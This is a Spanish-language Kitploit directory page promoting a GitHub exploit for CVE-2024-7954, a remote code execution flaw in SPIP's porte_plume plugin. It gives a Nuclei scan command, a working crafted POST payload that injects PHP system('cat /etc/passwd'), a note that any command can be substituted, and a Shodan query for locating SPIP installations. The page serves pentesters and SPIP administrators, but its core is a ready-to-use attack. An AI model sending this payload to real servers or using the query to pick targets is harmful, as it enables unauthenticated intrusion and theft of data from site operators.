Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
RCE-CVE-2024-7954 — Exploit para CVE-2024-7954, una RCE crítica en el plugin porte_plume de SPIP, con una solicitud HTTP manipulada y plantilla Nuclei para escaneo automatizado. | Kitploit
Herramientas/GitHubGitHub/arthikw3b/rce-cve-2024-7954
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubarthikw3b/rce-cve-2024-7954

RCE-CVE-2024-7954

Exploit para CVE-2024-7954, una RCE crítica en el plugin porte_plume de SPIP, con una solicitud HTTP manipulada y plantilla Nuclei para escaneo automatizado.

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

RCE-CVE-2024-7954

Descripción

El plugin porte_plume, utilizado por versiones de SPIP anteriores a 4.30-alpha2, 4.2.13 y 4.1.16, es susceptible a una vulnerabilidad crítica de ejecución arbitraria de código (RCE). Este fallo permite a un atacante remoto no autenticado ejecutar código PHP arbitrario como el usuario de SPIP mediante la creación de una solicitud HTTP específica. El potencial de explotación es grave, permitiendo a los atacantes ejecutar comandos maliciosos en el servidor, lo que podría provocar acceso no autorizado, violaciones de datos o un mayor compromiso del sistema.

Detalles de la Vulnerabilidad

  • Software Afectado: SPIP (anterior a las versiones 4.30-alpha2, 4.2.13 y 4.1.16)
  • Tipo de Vulnerabilidad: Ejecución Remota de Código (RCE)
  • Nivel de Gravedad: Crítico
  • Explotabilidad: Atacantes remotos y no autenticados pueden explotar esta vulnerabilidad.

Exploit

##Nuclei Scan

root@kitploit:~
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml





Un ejemplo de una solicitud HTTP manipulada que puede utilizarse para explotar esta vulnerabilidad es el siguiente:

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB

Explicación del Exploit:

  • La solicitud POST está dirigida a la acción porte_plume_previsu del archivo index.php de SPIP.
  • El parámetro data contiene un payload que aprovecha la función system() de PHP para ejecutar un comando (en este caso, cat /etc/passwd), que lee el contenido del archivo de contraseñas.
  • Al cambiar el comando dentro de la función system(), un atacante podría ejecutar cualquier código PHP en el servidor, lo que tendría consecuencias graves.

Shodan Dork

Para identificar instalaciones de SPIP potencialmente vulnerables, se puede utilizar la siguiente consulta de búsqueda de Shodan:

root@kitploit:~
app="SPIP"

Esta vulnerabilidad subraya la importancia de mantener el software actualizado e implementar medidas de seguridad robustas para protegerse contra la explotación.

Descargar herramienta